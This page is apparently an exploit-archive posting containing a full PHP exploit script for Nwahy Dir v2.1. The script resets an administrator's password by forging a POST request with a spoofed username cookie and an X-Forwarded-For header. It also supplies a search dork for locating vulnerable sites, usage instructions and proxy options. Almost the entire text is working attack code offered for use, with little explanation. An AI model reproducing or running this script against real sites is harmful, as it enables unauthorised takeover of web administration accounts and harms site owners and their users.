Home / os / win10

nwahydir-password.txt

Posted on 10 July 2009

<? /* [ Nwahy Dir v2.1 Change Admin Password Exploit ] [-] Author : rEcruit [-] Mail : recru1t[@]ymail.com [-] Download : http://nwahy.com/showdownload-3105.html [-] Vuln in ./admincp/admininfo.php [code] $u = addslashes($_COOKIE['username']); $query = mysql_query ("SELECT * FROM `dlil_admin` WHERE username='$u' AND adminoruser='0'") or die ("Query failed"); $counts = mysql_num_rows($query); if($counts == 0){ echo "<div align='center'>......................</div>"; }else{ [/code] [-] Works On : 1. Nwahy Articles v1 2. Nwahy scripts v1 3. Nwahy book v1 [-] Note : Path to Control Panel "/admincp/" . */ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function Usage() { print " "; print "/------------------------------------------------------------\ "; print "| Nwahy Dir v2.1 Change Admin Password Exploit | "; print "------------------------------------------------------------/ "; print "| [-] Author : rEcruit | "; print "| [-] Mail : recru1t@ymail.com | "; print "| [-] Greetz : RAGE SCREAM , SAUDI L0rD , Fantastic Egypt | "; print "------------------------------------------------------------/ "; print "| [-] Dork : Nwahy.com 2.1 , inurl:'add-site.html' | "; print "| [+] Usage : php Exploit.php HOST PATH Options | "; print "| [-] HOST : Target server (ip/hostname) | "; print "| [-] PATH : Path to Nwahy Dir | "; print "| [-] Options : | "; print "| =>Proxy :(ex. 0.0.0.0:8080) | "; print "------------------------------------------------------------/ "; print " "; exit; } function Send() { Global $host,$path,$user,$pwd,$proxy; if(empty($proxy)) { $Connect = @fsockopen($host,"80") or die("[-] Bad Host ."); }else{ $proxy = explode(":",$proxy); $Connect = @fsockopen($proxy[0],$proxy[1]) or die("[-] Bad Proxy ."); } $Payload = "username={$user}&password={$pwd}"; $Packet .= "POST {$path}/admincp/admininfo.php?action=edit HTTP/1.1 "; $Packet .= "Host: {$host} "; $Packet .= "Cookie: username={$user} "; $Packet .= "X-Forwarded-For: 127.0.0.1 "; $Packet .= "Content-Type: application/x-www-form-urlencoded "; $Packet .= "Content-Length: ".(strlen($Payload))." "; $Packet .= "Connection: close "; $Packet .= $Payload; fputs($Connect,$Packet); while(!feof($Connect)) $Response .= @fgets($Connect,2048); fclose($Connect); return $Response; } function Login() { $Response = @Send(); if(eregi("refresh",$Response)) { $msg = "[-] Password changed . "; } elseif(eregi("<div align='center'>",$Response)) { $msg = "[-] Bad username . "; } else { $msg = "[-] Exploit failed . "; } return $msg; } if ($argc < 3) Usage(); $host = $argv[1]; $path = $argv[2];; $proxy = $argv[3]; Print " [-] Connecting to {$host} .... "; while(1) { Print "[-] Username: "; if($user = str_replace (" ", "%20", trim(fgets(STDIN)))) { Print "[-] New password: "; if($pwd = str_replace (" ", "%20", trim(fgets(STDIN)))) { Print Login(); exit; } } } //end while ?>

 

TOP

Malware :